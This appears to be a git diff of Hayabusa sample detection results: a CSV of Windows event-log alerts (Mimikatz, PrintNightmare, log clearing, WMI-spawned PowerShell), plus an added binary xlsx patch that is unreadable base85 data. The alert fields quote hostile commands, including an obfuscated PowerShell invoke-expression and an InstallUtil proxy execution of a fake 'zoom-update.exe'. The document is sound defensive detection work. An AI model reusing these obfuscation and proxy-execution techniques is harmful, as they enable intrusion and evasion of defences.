Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,301,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,848,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,5142,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server 
installation (PrintNightmare).evtx" +2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,300,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx +2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx +2021-10-27 19:28:26.307 +09:00,FS03.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx +2021-10-27 19:34:49.837 +09:00,FS03.offsec.lan,6416,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx" +2021-10-27 19:34:50.024 +09:00,FS03.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx" +2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: ""cmd.exe"" : Path: 
C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\spoolsv.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx +2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx +2021-11-02 23:15:23.676 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files or Information/ID4688-Certutil download.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: powershell $env:I4Pzl|.(Get-C`ommand ('{1}e{0}'-f'x','i')) : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: OFFSEC\admmig : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Suspicious PowerShell Parent 
Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,WMI Spawning Windows PowerShell,,rules/sigma/process_creation/win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-18 16:40:29.566 +09:00,PC-01.cybercat.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /nologo /target:exe /out:zoom-update.exe C:\Users\pc1-user\Desktop\zoom-update.cs : Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe : User: CYBERCAT\pc1-user : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1218.004,technique_name=InstallUtil : Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\pc1-user\Desktop\zoom-update.exe : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe : User: CYBERCAT\pc1-user : Parent Command: ""C:\Windows\system32\cmd.exe"" 
",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx 
diff --git a/sample-results/hayabusa-sample-evtx-ResultsDefaultSettings.xlsx b/sample-results/hayabusa-sample-evtx-ResultsDefaultSettings.xlsx new file mode 100644 index 0000000000000000000000000000000000000000..0b2d2443afc96f21071580150345c2f41c87578f GIT binary patch literal 583620 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 